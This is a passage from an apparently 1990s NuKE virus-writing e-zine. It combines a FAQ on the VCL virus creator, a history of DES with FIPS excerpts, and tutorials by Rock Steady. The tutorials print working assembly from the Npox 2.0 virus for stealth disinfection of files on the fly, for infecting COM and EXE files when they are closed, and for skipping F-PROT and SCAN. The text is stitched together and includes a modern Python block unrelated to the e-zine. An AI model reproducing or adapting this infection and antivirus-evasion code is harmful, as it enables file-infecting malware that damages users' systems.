for some reason you are compiling from DOS, TURN ENCRYPTION OFF. You
see, unlike viruses, which can start off unencrypted, trojans must be
encrypted from the start, since they only go off once and are sent
direct, not in infected files. For that reason, the general technique of
having the initial encryption key be zero (used by almost all encrypted
viruses) won't work; VCL generates the encryption routine assuming the
trojan's already encrypted. When you compile from the IDE, VCL pre-
encrypts the trojan, so the encryption/decryption routine decrypts it at
runtime. But when you compile from DOS, the trojan is unencrypted, so
when it's run, the routine *encrypts* the virus, causing it to crash
(the processor's trying to run useless code).


Q: HEY D00D I WANT TO HELP U WITH YOUR VIRUS CREATOR LAB NOW! WHAT DO
I DO FOR IT NE WAY? THANX L8R!!!

A: Damn it, Suicidal Maniac, didn't you hear me the first time? FUCK OFF!


Q: When I link my virus, it says "Warning: no stack." What's wrong?

A: Absolutely nothing. The linker can give this message if it's generating
a .COM file (which all VCL executables are). It thinks there should be
a stack, but .COMs don't have built-in stacks, only .EXEs do. Be sure
to run EXE2BIN, however, as the linker outputs an .EXE file.

Nowhere Man and The NuKE Associates
===========================================================================
===========================================================================
Data Encryption Standard (DES)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The DES algorithm is a mathematical device, not an IC chip, computer system
or other piece of hardware. Many H/Pers have heard the buzzword
"DES Encryption" many times and, yet, few individuals seem to know what it
really means. In my search to find out more about the IBM 9600 modems
included with the IBM 4700s, I came upon the need to know how DES really
worked, in order to learn about its weaknesses. Hopefully this will answer
many questions you have, as well as generate a few.

The Computer Age brought with it computer usage in banking and the
financial institutions. Inevitably, computer crime came along with it.
There arose the problem that, with sufficient knowledge and a computer
terminal, one could transfer funds into his own account, make credit
purchases on someone else's card, or even get money from a cash-dispensing
machine.

IBM quickly realized this and in the early 1970s set up a research group to
develop a suitable cipher code to protect data. In 1971, a code named
LUCIFER was developed. It was sold to Lloyds of London for use with an
IBM-developed cash-dispensing system.


LUCIFER
~~~~~~~
Lucifer was successful but it had some weaknesses. IBM then spent about
three years refining and strengthening Lucifer. The code was analyzed over
and over by experts in cryptology. It withstood sophisticated
cryptanalytic attacks and, by 1974, it was ready to market. Around the
same time, the National Bureau of Standards (NBS) which since 1965 was
responsible for developing standards for the purchase of computer equipment
by the Federal Government (USA) initiated a study of computer security. The
NBS saw a need for an encryption method, and solicited for a suitable
encryption algorithm. This was done in May 1973, and August 1974. The
algorithm was to be for the storage and transmission of unclassified data.
In response to this solicitation IBM submitted its Lucifer cipher. This
cipher consisted of an extremely complex algorithm embedded in an IC
structure. Basically the cipher key goes into a series of eight "S" boxes
-- complex mathematical formulas that encrypt and decrypt data with the
appropriate key. The initial Lucifer cipher had a 128-bit key. Before it
submitted the cipher to NBS, IBM shortened it by removing more than half
the key.


NSA Participation
~~~~~~~~~~~~~~~~~
The National Security Agency (NSA), however, had taken an enormous interest
in Project Lucifer. It had lent IBM a hand in the development process and
had helped to develop the S-box structures, as NSA needed to know the
structure of Lucifer just in case they needed to decrypt data encoded with
it. For years NSA had been dependent on international data communications.
It monitored data communications, such as Middle East oil transactions and
messages, and the financial and trade transactions from Latin America,
Europe, and the Far East. Also, military and diplomatic intelligence
(encrypted using crude techniques) were picked up and deciphered by NSA.
Thus, much information about Communist countries was obtained from non-
communist countries. Now, the development of an economical, highly secure,
data-encryption device threatened to cause NSA serious trouble. Also,
outside researchers might stumble across some of NSA's methods.

Meetings of NSA and IBM resulted in an agreement by IBM to reduce its key
from 128 bits to 56 bits, and to classify certain details about their
selection of the eight "S" boxes for the cipher. The National Bureau of
Standards passed this cipher to NSA for analysis. The NSA certified the
algorithm as "free" of any mathematical or statistical weaknesses and
recommended it as the best candidate for the National Data Encryption
Standard (DES). This suggestion was met with criticism. Was the cipher just
long enough to prevent corporate eavesdroppers from penetrating it, and
just short enough for NSA's code breakers?! Was there a mathematical trick
(CLASSIFIED) that would enable NSA to quickly break the code?

The NSA had been tinkering with the critical "S" boxes, and it had
therefore INSISTED that certain details were to be classified. The reason
cited for this was simple: since the DES would be commercially available
and would be sold abroad as well, NSA would be hanging itself by permitting
the foreign use of an unbreakable cipher. The weaknesses designed into the
cipher would still allow the agency to penetrate every communications
channel and data bank using DES. The code breakers at NSA wanted to be sure
the NSA could break the cipher. As a result, a bureaucratic agreement was
reached. The S-Box part of the cipher was strengthened (which is
CLASSIFIED), and the key, which was dependent on the users of the code was
weakened.

(Did NSA put a "Backdoor" into DES? The answer is normally YES! NSA had to
have the upper-hand to all code encrypted with DES. If we go back a few
months a movie was based on this topic. "Sneakers" raised several hints
that DES had a backdoor.)

Computer "rumours" (well more like FACTS) say that it would be possible to
build a computer using a million special "search chips" that could test a
million possible solutions per second, and, therefore in 72,000 seconds
(20 hours), all possible combinations could be tried. There would be a 50%
probability that just 10 hours of trial-time would break the code
(56-bits).

What if the 128-bit key, the original Lucifer, had been submitted for
consideration? Or did IBM submit the 128-bit key Lucifer but "reasoned"
with the NSA for a 56-bit key? Nevertheless a 128-bit key provides
34.03 x 10 ^ 37, or 34 followed by 37 zeros, combinations! This number
is astronomical and incomprehensible to most people. If one TRILLION
solutions per second were possible it would take a mere 34 x 10 ^ 25
seconds or about 10,800,000,000,000,000,000 YEARS! And we are only rumoured
to know about the one-million possible solutions per second, not a trillion
as used in this example! Therefore IBM's Lucifer code (at present) is
probably unbreakable.


DES Becomes Accepted
~~~~~~~~~~~~~~~~~~~~
And on June 15, 1977, the Data Encryption Standard (DES) became the
official civilian cipher of the U.S. government. It is now widely used in
banking systems and other classified institutions.

To follow are a few clips from FIPS on DES; perhaps we can learn a tad from
this code and implement a rather crude manner of it into a virus? Undoubtedly
we will have all of Solomon's, McAfee's, Frisk's and others' horses and men
trying to "crack" the code, but will they succeed in doing so? There's only
one way to find out now? Right?


Excerpts from the Data Encryption Standard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From Federal Information Processing Standards (FIPS) publications 46, 74,
and 81.)

The Data Encryption Standard (DES) specifies an algorithm to be
implemented in electronic hardware devices and used for the cryptographic
protection of computer data. The publications concerning this standard
provide a complete description of the mathematical algorithm for encrypting
(enciphering) and decrypting (deciphering) binary-coded information.
Encrypting data converts the data to an unintelligible form called cipher.
Decrypting a cipher converts the data back to its original form. The
algorithm described in the standard specifies both enciphering and
deciphering operations which are based on a binary number called a key. The
key consists of 64 binary digits, of which 56 bits are used directly by the
algorithm and 8 bits are used for error detection (checksum).

Binary-coded data may be cryptographically protected using the DES
algorithm in conjunction with a key. The key is generated in such a way
that each of the 56 bits used directly by the algorithm is random and the
8 error-detecting bits are set to make the parity of each 8-bit byte of the
key odd, i.e.: there is an odd number of 1s in each 8-bit byte. Each member
of a group of authorized users of encrypted computer data must have the key
that was used to encipher the data in order to use the data. This key, held
by each member in common, is used to decipher any data received in cipher
form from other members of the group. The encryption algorithm specified in
this standard is commonly known among those using the standard. The unique
key chosen for use in a particular application makes the results of
encrypting data, using the algorithm, unique. Selection of a different key
causes the cipher, which is produced for any given set of inputs, to be
different. The cryptographic security of the data depends on the security
provided for the key that is used to encipher and decipher the data.

Data can be recovered from a cipher only by using the exact same key that
was used to encipher it. Unauthorized recipients of the cipher, who know the
algorithm but do not have the correct key, cannot derive the original data
algorithmically. However, anyone who does have the key and the algorithm
can easily decipher the cipher and obtain the original data. A standard
algorithm, which is based on a secure key, thus provides a basis for
exchanging encrypted computer data, by issuing the key that is used to
encipher it only to those authorized to have the data. Additional Federal
Information Processing Standards (FIPS) guidelines for implementing and
using the DES are being developed and will be published by NBS.

"Guidelines for Implementing and Using the NBS Data Encryption Standard,"
FIPS Publication 74.

NBS describes two different modes for using the algorithm described in this
standard. Blocks of data containing 64 bits may be directly entered into
the device where 64-bit cipher blocks are generated under control of the
key. This is called the "Electronic CodeBook" (ECB) mode. Alternatively, the
device may be used as a binary stream generator to produce statistically
random binary bits, which are then combined with the clear (unencrypted)
data (1 to 64 bits) using an "Exclusive OR" (XOR) logic operation. In order
to assure that the enciphering device and the deciphering device are
synchronized their inputs are always set to the previous 64 bits of cipher
that were transmitted or received. This second mode of using the encryption
algorithm is called the "Cipher FeedBack" (CFB) mode.

The Electronic CodeBook mode generates blocks of 64 cipher bits. The Cipher
Feedback mode generates a cipher having the same number of bits as the
plain text. Each block of cipher is independent of all others when the
Electronic CodeBook mode is used, while each byte (group of bits) of cipher
depends on the previous 64 cipher bits when the Cipher FeedBack mode is
used.

The cryptographic algorithm specified in this standard transforms a 64-bit
binary value into a unique 64-bit binary value based on a 56-bit variable.
If the complete 64-bit input is used (i.e.: none of the input bits should be
predetermined from block to block) and if the 56-bit variable is randomly
chosen, no technique other than that of trying all the possible keys, using
a known input and output for the DES, will guarantee finding the chosen key.
As there are over 70,000,000,000,000,000 (70 quadrillion) possible keys of
56 bits, the feasibility of deriving a particular key in this way is
extremely unlikely in typical "threat" environments. Moreover, if the key
is changed frequently, the risk of this event happening is greatly
diminished. However, users should be aware that it is theoretically
possible to derive the key in fewer trials (with a correspondingly lower
probability of success depending on the number of keys tried), and should
be cautioned to change the key as often as practical. Users must change
the key and must provide it with a high level of protection in order to
minimize the potential risks of its unauthorized computation or
acquisition. The feasibility of computing the correct key may change with
advances in technology.


Data Encryption Methods
~~~~~~~~~~~~~~~~~~~~~~~
Encryption is the transformation of data from its original intelligible
form to an unintelligible cipher form. Two basic transformations may be
used: permutation and substitution. Permutation changes the order of the
individual symbols comprising the data. In a substitution transformation,
the symbols themselves are replaced by other symbols. During permutation,
the symbols retain their identities but lose their positions. During
substitution, the symbols retain their positions but lose their original
identities.

The set of rules for a particular transformation is expressed in an
algorithm. Basic transformations may be combined to form a complex
transformation. In a computer system, the symbols of the data are groups of
one or more binary digits (1s and 0s) called bits. A group of bits is
called a byte. In computer applications, the encryption transformation of
permutation reorders the bits of the data. The encryption transformation of
substitution replaces one bit with another or one byte with another.


Data Encryption Algorithm
~~~~~~~~~~~~~~~~~~~~~~~~~
The algorithm is designed to encipher and decipher blocks of data
consisting of 64-bits under control of a 64-bit key. Deciphering must be
accomplished by using the same key that was used for enciphering, but with
the schedule of addressing the key bits altered so that the deciphering
process is the reverse of the enciphering process.

A block to be enciphered is subjected to an initial permutation, IP, and
then to a complex key-dependent computation, and, finally, to a permutation
which is the inverse of the initial permutation. The key-dependent
computation can be defined simply in terms of a function "F" called the
cipher function, and a function "KS" called the key schedule. A
description of the computation is given first along with the details as to
how the algorithm is used for encipherment. Next the use of the algorithm
for decipherment is described. Finally, a definition of the cipher
function "F" is given in terms of the primitive functions, which are
called selection functions "Si" and the permutation function "P". The
primitive functions Si, P, KS of the algorithm are contained in the
Appendix of FIPS Publication 46.

The following notation is convenient: Given two blocks (L and R) of bits,
LR denotes the block consisting of the bits of L followed by the bits of R.
Since concatenation is associative, B1B2...B8, for example, denotes the
block consisting of the bits of B1 followed by the bits of B2...followed by
the bits of B8.


Enciphering
~~~~~~~~~~~
A sketch of the enciphering computation is given below. The following
information is given more clearly and accurately in FIPS Publications 46
and 74. It is quoted here for informational purposes only.

The 64 bits of the input block to be enciphered are first subjected to the
following permutation, called the initial permutation, IP:

--------- IP -----------
58 50 42 34 26 18 10  2
60 52 44 36 28 20 12  4
62 54 46 38 30 22 14  6
64 56 48 40 32 24 16  8
57 49 41 33 25 17  9  1
59 51 43 35 27 19 11  3
61 53 45 37 29 21 13  5
63 55 47 39 31 23 15  7
------------------------

That is, the permuted input has bit 58 of the input as its first bit, bit
50 as its second bit, and so on, with bit 7 as its last bit. The permuted
input block is then the input to the complex key-dependent computation
described below. The output of that computation, called the preoutput, is
then subjected to the following permutation, IP-1, which is the inverse of
the initial permutation:

-------- IP -1 ---------
40  8 48 16 56 24 64 32
39  7 47 15 55 23 63 31
38  6 46 14 54 22 62 30
37  5 45 13 53 21 61 29
36  4 44 12 52 20 60 28
35  3 43 11 51 19 59 27
34  2 42 10 50 18 58 26
33  1 41  9 49 17 57 25
------------------------

That is, the output of the algorithm has bit 40 of the preoutput block as
its first bit, bit 8 as its second bit, and so on, until bit 25 of the
preoutput block is the last bit of the output.


Characteristics of the DES Algorithm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DES algorithm is a recirculating, 64-bit, block product cipher whose
security is based on a secret key. DES keys are 64- bit binary vectors
consisting of 56 independent information bits and 8 parity bits. The parity
bits are reserved for error-detection purposes and are not used by the
encryption algorithm. The 56 information bits are used by the enciphering
and deciphering operations and are referred to as the active key. Active
keys are generated (selected at random from all possible keys) by each
group of authorized users of a particular computer system or set of data.
Each user should understand that the key must be protected and that any
compromise of the key will compromise all data and resources protected by
that key. In the encryption computation, the 64-bit data input is divided
into two halves, with each consisting of 32 bits. One half is used as input
to a complex nonlinear function, and the result is Exclusive-OR'ed to the
other half. After one iteration, or round, the two halves of the data are
swapped and the operation is performed again. The DES algorithm uses 16
rounds to produce a recirculating block product cipher. The cipher produced
by the algorithm displays no correlation to the input. Every bit of the
output depends on every bit of the input and on every bit of the active
key. The security provided by the DES algorithm is based on the fact that,
if the key is unknown, an unauthorized recipient of encrypted data, knowing
some of the matching input data, must perform an unacceptable effort to
decipher other encrypted data or recover the key. Even having all but one
bit of the key correct does not result in intelligible data.

The only known way of obtaining the key with certainty is by obtaining
matching ciphertext and plaintext and, then, exhaustively testing the keys
by enciphering the known plaintext with each key and comparing the result
with the known ciphertext. Since 56 independent bits are used in a DES key,
2^56 such tests are required to guarantee finding a particular key. The
expected number of tests needed to recover the correct key is 2^55. At one
microsecond per test, 1142 years would be required. Under certain
conditions (not only knowing matched plaintext and ciphertext but also the
complement of the plaintext and the resulting ciphertext), the expected
effort could be reduced to 571 years. The possibility of 70 quadrillion
keys makes the guessing or computing of any particular key very unlikely,
given that the guidelines for generating and protecting a key provided in
the publication are followed. Of course, one can always reduce the time
required to exhaust any cryptoalgorithm by having several devices working in
parallel; time is reduced but initial expenses are increased.
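The key structure and the exhaustive-search arithmetic above can be checked directly. The following Python is an added example, not part of the journal: it validates the odd-parity bytes of a DES key, extracts the 56-bit active key, and reproduces the 2^55 trials / 1142-year and 571-year figures from the stated one microsecond per trial; the sample key is the published FIPS 46 test key.

```python
"""Added example (not from the NuKE text): the key structure and the
exhaustive-search cost that the DES section states in prose.

  * a DES key is 64 bits, of which 8 are odd-parity bits (one per byte)
    and 56 are the "active key" the cipher actually uses;
  * the only generic attack is exhaustive search over the 2^56 active
    keys, 2^55 trials on average, halved again when the complement
    property can be used, and divided among parallel devices.
"""
from typing import List, Tuple

DES_KEY_BITS = 64
DES_PARITY_BITS = 8
DES_ACTIVE_BITS = DES_KEY_BITS - DES_PARITY_BITS      # 56
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def has_odd_parity(byte: int) -> bool:
    """Each DES key byte carries odd parity in its least significant bit."""
    return bin(byte & 0xFF).count("1") % 2 == 1


def check_des_key_parity(key: bytes) -> Tuple[bool, List[int]]:
    """Return (all_ok, indexes of bytes with bad parity) for an 8-byte key."""
    if len(key) != DES_KEY_BITS // 8:
        raise ValueError("a DES key is exactly 8 bytes")
    bad = [i for i, b in enumerate(key) if not has_odd_parity(b)]
    return (not bad, bad)


def active_key(key: bytes) -> int:
    """Drop the parity bit of every byte and pack the remaining 56 bits.

    The cipher never looks at the parity bits, so two keys that differ
    only there have the same active key and encrypt identically.
    """
    if len(key) != DES_KEY_BITS // 8:
        raise ValueError("a DES key is exactly 8 bytes")
    active = 0
    for b in key:
        active = (active << 7) | (b >> 1)
    return active


def fix_parity(key: bytes) -> bytes:
    """Rewrite the parity bit of each byte so every byte has odd parity."""
    out = bytearray()
    for b in key:
        b &= 0xFE                      # clear the parity bit
        if not has_odd_parity(b):
            b |= 1                     # set it when the 7 data bits are even
        out.append(b)
    return bytes(out)


def expected_trials(active_bits: int = DES_ACTIVE_BITS,
                    complement_pair: bool = False) -> int:
    """Expected trial encryptions before the right key is found.

    Half the keyspace on average; knowing the ciphertext of the
    complemented plaintext as well (DES complement property) halves it.
    """
    trials = 1 << (active_bits - 1)
    if complement_pair:
        trials >>= 1
    return trials


def expected_years(seconds_per_trial: float, devices: int = 1,
                   complement_pair: bool = False) -> float:
    """Wall-clock years for the expected search spread over `devices`."""
    total = expected_trials(complement_pair=complement_pair) * seconds_per_trial
    return total / devices / SECONDS_PER_YEAR


if __name__ == "__main__":
    key = bytes.fromhex("133457799BBCDFF1")      # FIPS 46 sample key
    print("parity ok:", check_des_key_parity(key)[0])
    print("active key:", hex(active_key(key)))
    print("years at 1 us/trial:", round(expected_years(1e-6)))
    print("with complement pair:", round(expected_years(1e-6, complement_pair=True)))
```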

Rock Steady/NuKE
===========================================================================
===========================================================================
*************************************
** Disinfecting an Infected File **
** **
** By Rock Steady/NuKE **
*************************************

The BEST advantage a virus can have is `Disinfecting on the Fly', as we
must try to hide the virus as well as possible! And nowadays Anti-Virus
programs are going crazy. As I remember, at the time Npox 2.0 was
developed it would disinfect every file opened by F-prot and Scan, and
when the scanner found nothing and closed the file to go on to the next,
Npox would re-infect it. It can truly cause havoc. As a matter of fact
Frisk didn't like this, as I had some `Anti Fuck-Prot' routines, and he
added his own routine to open files by Int21h/6C00h, as Npox only
disinfected on Int21h/3Dh; however, making the virus disinfect on
Int21h/6C00h doesn't require much work: simply take the ASCIIZ
string at DS:SI and put SI into DX so we have DS:DX pointing to it,
then run this routine.

The basic idea of disinfection is this...
-For .COM files
 Restore the original first 3 bytes of the program; these 3 bytes are
 usually saved somewhere inside the virus. Then simply remove the virus
 from the end of the .COM file! We do this by jumping to the end of the
 COM file and subtracting the virus size from the file size; that new
 value is the original file size!
 NOTE: if you write a virus whose length changes (polymorphic), it is
 wise to save the original file size before infecting.

-For .EXE files & Overlays
 This procedure is not different, just that if you changed CS:IP &
 SS:SP in the EXE header, simply restore the original values, or, to
 save time, simply save the original EXE header (first 1B bytes) in
 the virus and write that to the beginning, as I did for Npox 2.0.
 Then subtract yourself from the original size and cut it off!

I will now follow through the Npox 2.0 virus routine closely so you can
understand this process.

Okay, the first thing you would want to do is CHECK if this is a valid
file! If the virus infects COMs & EXEs, do not waste your time looking
through other extensions, or, for tight code, you can leave this check
out and "HOPE" the `infection' marker test will fail on everything that
isn't infected! Meaning: if the virus uses the seconds field set to 60
(as Npox does) then naturally only INFECTED files will have a time stamp
of 60 seconds, and this routine is not needed...

opening_file:   call check_extension    ;Check for .COM extension
                jnc open_fuck2          ;YES; Jmp & Disinfect
                call check_exten_exe    ;Check for .EXE extension
                jnc open_fuck2          ;YES; Jmp & disinfect
                jmp dword ptr cs:[int21] ;Otherwise go to DOS

; At this point the file has a .COM or .EXE extension, so we continue

open_fuck2:     push ax                 ;Save AX
                mov ax,3d02h            ;Ready to open
                call calldos21          ;Do it!
;NOTE: it is important you call Int21h YOURSELF! You CAN NOT use an "Int 21h"
;instruction, as the virus will intercept it and come back to this routine,
;over and over again in a never-ending loop, until the stack gets too big,
;overwrites the code and the system jams... all done in about 2 seconds...
                jnc open_fuck1          ;No Error Continue
                pop ax                  ;restore
                iret                    ;Exit

open_fuck1:     push bx
                push cx
                push dx
                push ds
                mov bx,ax               ;BX=File handle
                mov ax,5700h            ;Get file TimeStamp
                call calldos21

                mov al,cl               ;move seconds into al
                or cl,1fh               ;Left just seconds
                dec cx                  ;60 Seconds
                xor al,cl               ;cmp
                jnz opening_exit3       ;NOT 60 seconds exit!

                dec cx
                mov word ptr cs:[old_time],cx ;Save time Stamp
                mov word ptr cs:[old_date],dx ;Save Date Stamp

                mov ax,4202h            ;Goto the End of File
                xor cx,cx
                xor dx,dx
                call calldos21

                mov cx,dx               ;Save the filesize
                mov dx,ax               ;we will need it later
                                        ;to subtract the virus
                push cx                 ;size from it...
                push dx                 ;Save it...

Here we now get the first 3 bytes (for COM) or the first 1B bytes (EXE
header). In the Nuke Pox virus I save the ORIGINAL first 3 bytes of the
.COM at the VERY END! Since the buffer I made is 1B hex bytes, it is able
to hold the EXE header or the 3 .COM bytes; either way these bytes are
the last 1B bytes of the file, since they're at the end... figure out
where you saved your 3 bytes or EXE header for your virus, or use the
Npox routine...

                sub dx,1Bh              ;Subtract 1B bytes from
                sbb cx,0                ;the filesize!
                mov ax,4200h            ;Now our pointer will
                call calldos21          ;point to the 1B bytes
                                        ;Where the COM & EXE
                                        ;original bytes are
                push cs
                pop ds                  ;CS=DS (for exes)

                mov ah,3fh              ;Read them into Buffer
                mov cx,1Bh              ;1B bytes
                mov dx,offset buffer    ;to our buffer
                call calldos21

Hmm, now we've got the original bytes; all we gotta do is write them
back to the file's beginning...

                xor cx,cx               ;Goto Beginning of File
                xor dx,dx               ;
                mov ax,4200h
                call calldos21

                mov ah,40h              ;Write first three bytes
                mov dx,offset buffer    ;our buffer
                mov cx,1Bh              ;1B bytes for EXEs
                cmp word ptr cs:[buffer],5A4Dh
                je open_exe_jmp         ;if EXE file jump
                mov cx,3h               ;if COM write only 3 bytes
open_exe_jmp:   call calldos21

We wrote the original file's data back into place; now we need to cut the
virus off the file. The virus is written at the end of the file, so all
we do is set our file pointer to EOF - Virus_Size, which gives us the
original file length!

                pop dx                  ;EOF - Virus_Size
                pop cx                  ;to get ORIGINAL File size
                sub dx,virus_size       ;subtract virus size
                sbb cx,0
                mov ax,4200h
                call calldos21

Now this is perhaps the "TRICKIEST" part. In order to "CROP" the file at
our new pointer location, we use DOS to crop it by writing 0 bytes at the
new location: DOS will make that location the NEW EOF, as a result
cutting off the virus and freeing its sectors in the FAT.

                mov ah,40h              ;Write new EOF
                xor cx,cx               ;Zero Bytes
                call calldos21          ;doit

                mov cx,word ptr cs:[old_time] ;Restore file time
                mov dx,word ptr cs:[old_date] ;Restore file date
                mov ax,5701h
                int 21h

                mov ah,3eh              ;Close File
                call calldos21

opening_exit3:  pop ds
                pop dx
                pop cx
                pop bx
                pop ax
                jmp dword ptr cs:[int21] ;Return to DOS...

Ahh, the file is now disinfected; we safely return to DOS, and DOS may
now open the file for inspection...

Rock Steady/NuKE
===========================================================================
===========================================================================
****************************
** Infection on Closing **
** **
** By Rock Steady/NuKE **
****************************
This routine goes out for a few people that had trouble hacking this
routine themselves... I kinda like it, it's my very OWN, no Dark Avenger
hack; it is VERY straightforward, and kinda simple... I was not going
to put this here, but since I `promised' people and left them hanging
with `Wait for IJ#5', I guess I owed it to you... huh?

Again this code comes right out of Npox 2.0; it's neat, simple, fast,
cool, and it works. Npox is your example. I heard MANY MANY complaints
about other `Virus writing guides', meaning they explained the code but
sometimes the author himself never checked if the code was good, as he
may have modified it and not tested it... or whatever reason... Anyhow

------------------
Okay, once you have intercepted the Int21h/ah=3Dh function you make it
jump here...

closing_file:   cmp bx,0h               ;Handle=0?
                je closing_bye          ;if equal leave
                cmp bx,4h               ;Handle > 4
                ja close_cont           ;if YES, then JUMP!
closing_bye:    jmp dword ptr cs:[int21] ;Leave, no interest to us

The whole point of the above code is that DOS contains 5 predefined
handles, 0 -> 4; basically, those handles are the NULL, CON, AUX,
COMx, LPTx handles... So we surely do not need to continue once we
encounter one of those...

close_cont:     push ax
                push bx
                push cx
                push dx
                push di
                push ds
                push es
                push bp

Our biggest problem is: how do we know if this file is a .COM or .EXE or
simply just another dumb data file? We need this info before we can
try to infect it... We do this by getting DOS's "List of Lists"; this
will give us all the info we need on the file handle number we have in
BX! And we do that like so...

                push bx                 ;Save File Handle
                mov ax,1220h            ;Get the Job File Table
                int 2fh                 ;(JFT)

This will give us the JFT entry for the CURRENT file handle in BX, which
is returned in ES:DI. Then we use this information to get the address of
the System File Table!

                mov ax,1216h            ;Get System File Table (List)
                mov bl,es:[di]          ;system file table entry number
                int 2fh
                pop bx                  ;restore the Handle

                add di,0011h
                mov byte ptr es:[di-0fh],02h

                add di,0017h            ;Jump to the ASCIIZ string
                cmp word ptr es:[di],'OC' ;Is it a .COM file?
                jne closing_next_try    ;Next cmp...
                cmp byte ptr es:[di+2h],'M'
                jne pre_exit            ;Nope exit
                jmp closing_cunt3       ;.COM file continue

closing_next_try:
                cmp word ptr es:[di],'XE' ;Is it a .EXE file?
                jne pre_exit            ;No, exit
                cmp byte ptr es:[di+2h],'E'
                jne pre_exit            ;No, exit

If it is an .EXE file, check if it is F-PROT or SCAN. See, F-PROT when
started up opens itself, closes itself, etc... so that a dumb virus will
infect it, and then the CRC value changes and F-PROT screams... haha...
Fuck-Prot! is the name...

closing_cunt:   cmp word ptr es:[di-8],'CS'
                jnz closing_cunt1       ;SCAN
                cmp word ptr es:[di-6],'NA'
                jz pre_exit

closing_cunt1:  cmp word ptr es:[di-8],'-F'
                jnz closing_cunt2       ;F-PROT
                cmp word ptr es:[di-6],'RP'
                jz pre_exit

closing_cunt2:  cmp word ptr es:[di-8],'LC'
                jnz closing_cunt3
                cmp word ptr es:[di-6],'AE' ;CLEAN
                jnz closing_cunt3

pre_exit:       jmp closing_nogood

The REST is pretty much the EXACT same as `how' you'd infect a normal
file; I'll leave it for you to go through it... The hardest part is
OVER! The only tricky part is the ending... Remember to close the file
and then do an IRET; you don't leave control to DOS, as you only needed
to close it, so do it... OR DON'T close it and return to DOS, as DOS
will close it. Just DON'T CLOSE IT TWICE!!!!

closing_cunt3:  mov ax,5700h            ;Get file Time
                call calldos21
                mov al,cl
                or cl,1fh
                dec cx                  ;60 Seconds
                xor al,cl
                jz closing_nogood       ;Already infected

                push cs
                pop ds
                mov word ptr ds:[old_time],cx ;Save time
                mov word ptr ds:[old_date],dx

                mov ax,4200h            ;jmp beginning of
                xor cx,cx               ;file...
                xor dx,dx
                call calldos21

                mov ah,3fh              ;Get first 1b byte
                mov cx,1Bh
                mov dx,offset buffer
                call calldos21

                jc closing_no_good      ;error?
                mov ax,4202h            ;Jmp to the EOF
                xor cx,cx
                xor dx,dx
                call calldos21

                jc closing_no_good
                cmp word ptr ds:[buffer],5A4Dh ;.EXE file?
                je closing_exe          ;Yupe then jmp
                mov cx,ax
                sub cx,3h
                mov word ptr ds:[jump_address+1],cx ;Figure out the
                call infect_me          ;jmp for .com

                jc closing_no_good
                mov ah,40h              ;Write it to file
                mov dx,offset jump_address
                mov cx,3h
                call calldos21
closing_no_good:
                mov cx,word ptr ds:[old_time] ;Save file time
                mov dx,word ptr ds:[old_date] ;& date
                mov ax,5701h
                call calldos21

closing_nogood: pop bp
                pop es
                pop ds
                pop di
                pop dx
                pop cx
                pop bx
                pop ax
                jmp dword ptr cs:[int21]

As you see above, we DIDN'T close the file, so we leave DOS to do it.
The bottom is for infecting .EXEs...

closing_exe:    mov cx,word ptr cs:[buffer+20] ;Save the original
                mov word ptr cs:[exe_ip],cx ;CS:IP & SS:SP
                mov cx,word ptr cs:[buffer+22]
                mov word ptr cs:[exe_cs],cx
                mov cx,word ptr cs:[buffer+16]
                mov word ptr cs:[exe_sp],cx
                mov cx,word ptr cs:[buffer+14]
                mov word ptr cs:[exe_ss],cx

                push ax
                push dx
                call multiply
                sub dx,word ptr cs:[buffer+8]
                mov word ptr cs:[vir_cs],dx
                push ax
                push dx
                call infect_me
                pop dx
                pop ax
                mov word ptr cs:[buffer+22],dx
                mov word ptr cs:[buffer+20],ax
                pop dx
                pop ax
                jc closing_no_good

                add ax,virus_size
                adc dx,0

                push ax
                push dx
                call multiply
                sub dx,word ptr cs:[buffer+8]
                add ax,40h
                mov word ptr cs:[buffer+14],dx
                mov word ptr cs:[buffer+16],ax
                pop dx
                pop ax

                push bx
                push cx
                mov cl,7
                shl dx,cl

                mov bx,ax
                mov cl,9
                shr bx,cl

                add dx,bx
                and ax,1FFh
                jz close_split
                inc dx
close_split:    pop cx
                pop bx

                mov word ptr cs:[buffer+2],ax
                mov word ptr cs:[buffer+4],dx

                mov ah,40h
                mov dx,offset ds:[buffer]
                mov cx,20h
                call calldos21

closing_over:   jmp closing_no_good

;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Infection Routine...
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
infect_me       proc
                mov ah,40h
                mov dx,offset init_virus
                mov cx,virus_size
                call calldos21

                jc exit_error           ;Error Split
                mov ax,4200h
                xor cx,cx               ;Pointer back to
                xor dx,dx               ;Top of file!
                call calldos21

                jc exit_error           ;Split Dude...
                clc                     ;Clear carry flag
                ret
exit_error:
                stc                     ;Set carry flag
                ret
infect_me       endp
===========================================================================
===========================================================================
Multipartite Infection
~~~~~~~~~~~~~~~~~~~~~~

OK, you've seen them floating around... these whiz-bang you-bewt mongrel
viruses which never seem to go away, even after you disinfect every file
in existence... Huh... How the fuck did that come back?! Well it's really
quite simple, and I'm sure not all of you out there are complete idiots.
The fact is that the virus isn't even in any files! ...It's hiding in
the partition table, or the boot sector!

There are only a few viruses out there with the capability for
multipartite infection, or "boot/file virus". Tequila, Anthrax and
Invader are a few examples. My own creation, D„eM†ˆn, is another, going
a step further than any other boot/file virus has ever gone before, by
infecting almost everything possible.

The principle is VERY simple, in fact I kicked myself when I worked out
a way to do it. The idea is simple, and it's the very same principle
employed in any other TSR method... to hook interrupt 21h (DOS). This is
fine. BUT the only hitch is that DOS automatically overwrites the old
vector when it loads! So there's no point hooking it as soon as your
code loads up off the disk. So what can we do?

We will obviously have to wait for DOS to change the interrupt, so we
can hook it. But there's one problem! Other stupid programmers were
being selfish and changed the i21 pointer as a marker so that they can
tell if it's been changed... like Invader puts a -1 in the IP value of
int 21h... so if something like DaeMaen is also on the system, it thinks
it's DOS changing the pointer, hooks it and crashes the entire system...

The way I waited for the pointer to change was to hook interrupt 13
TWICE! (huh?) Pretty simple. What I did was have my int-check routine
hooked onto i13 first, then my i13 handler over the top. The reason why
you can't have it the other way is that in case another "program" hooks
i13 over the top, and you can't disable your int-check routine... so
